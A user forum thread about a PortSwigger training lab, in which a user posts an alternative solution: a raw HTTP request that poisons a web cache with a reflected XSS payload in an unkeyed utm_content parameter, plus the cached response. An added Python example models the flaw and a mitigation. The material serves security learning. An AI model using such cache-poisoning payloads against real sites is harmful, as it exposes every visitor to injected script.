Burp Suite User Forum


Hi, I think that I found a flaw.

aadda | Last updated: Jan 28, 2021 08:46PM UTC

Hi, I think that I found a flaw on the https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-cache-key-injection lab. You can solve the lab just by adding Pragma: x-get-cache-key and issuing a request to this endpoint:

-------------
GET /login?lang=en&utm_content=t'><svg/onload=alert(1)+x=' HTTP/1.1
Pragma: x-get-cache-key
ext............
--------------------

You will get a response like:

----------------------
HTTP/1.1 302 Found
Location: /login/?lang=en&utm_content=t'><svg/onload=alert(1)+x='
Vary: Origin
Connection: close
Cache-Control: max-age=35
Age: 1
X-Cache-Key: /login?lang=en$$
X-Cache: hit
X-XSS-Protection: 0
Content-Length: 0
--------------------

Notice the X-Cache-Key: it means anyone who visits the home page will be redirected to /login/?lang=en&utm_content=t'><svg/onload=alert(1)+x='. The [utm_content] parameter is unkeyed and will be reflected into the head tag in the HTML, and the XSS will execute.

[<link rel="canonical" href='//ace51f121f0a8ff3808125b800b800b0.web-security-academy.net/login/?lang=en&utm_content=t'><svg/onload=alert(1) x=''/>]

I just want to send this because it is easier than the solution in the lab.
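The mechanism the post describes, modelled as an added example (not code from the forum post, the lab or PortSwigger): a toy cache keys only on the path and the lang parameter, while the origin reflects the whole query string into its Location header, so a response seeded with an unkeyed utm_content value is served to later visitors who never sent it. The origin, cache and the INJECTED marker value are constructed for illustration; the strip_unkeyed flag shows the mitigation of never forwarding unkeyed parameters to the origin.

```python
from urllib.parse import parse_qs, urlencode

KEYED_PARAMS = {"lang"}  # constructed: what the flawed cache includes in its key


def origin(path, query):
    """Constructed origin: redirects /login to /login/ and reflects the full query string."""
    params = parse_qs(query, keep_blank_values=True)
    return {"status": 302, "Location": f"{path}/?{urlencode(params, doseq=True)}"}


def cache_key(path, query, keyed=KEYED_PARAMS):
    """Build the cache key from the path plus keyed parameters only (unkeyed ones dropped)."""
    params = parse_qs(query, keep_blank_values=True)
    kept = {k: v for k, v in params.items() if k in keyed}
    return f"{path}?{urlencode(kept, doseq=True)}$$"


class Cache:
    def __init__(self, strip_unkeyed=False):
        self.store = {}
        self.strip_unkeyed = strip_unkeyed

    def get(self, path, query):
        key = cache_key(path, query)
        if key in self.store:
            return dict(self.store[key], **{"X-Cache": "hit", "X-Cache-Key": key})
        if self.strip_unkeyed:
            # Mitigation: the origin only ever sees keyed parameters, so nothing
            # outside the cache key can be reflected into a cached response.
            params = parse_qs(query, keep_blank_values=True)
            query = urlencode({k: v for k, v in params.items() if k in KEYED_PARAMS}, doseq=True)
        resp = origin(path, query)
        self.store[key] = resp
        return dict(resp, **{"X-Cache": "miss", "X-Cache-Key": key})


def demo(strip_unkeyed):
    """Seed the cache with an unkeyed parameter, then fetch as a visitor who omits it."""
    c = Cache(strip_unkeyed)
    c.get("/login", "lang=en&utm_content=INJECTED")  # first request populates the cache
    victim = c.get("/login", "lang=en")              # victim sends only the keyed param
    return victim["X-Cache"], victim["Location"]
```

With the flawed cache, demo(False) returns a cache hit whose Location still carries the INJECTED value; with demo(True) the victim gets a hit whose Location contains only the keyed parameter.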

Hannah, PortSwigger Agent | Last updated: Feb 01, 2021 12:50PM UTC

Hi, could you send a video of this to support@portswigger.net so we can verify the solution? Cheers!

nil0x42 | Last updated: Feb 01, 2021 02:38PM UTC

Hi! I solved the challenge the same way...

Hannah, PortSwigger Agent | Last updated: Feb 02, 2021 12:58PM UTC

Hi, could you drop us a message with a video to support@portswigger.net?
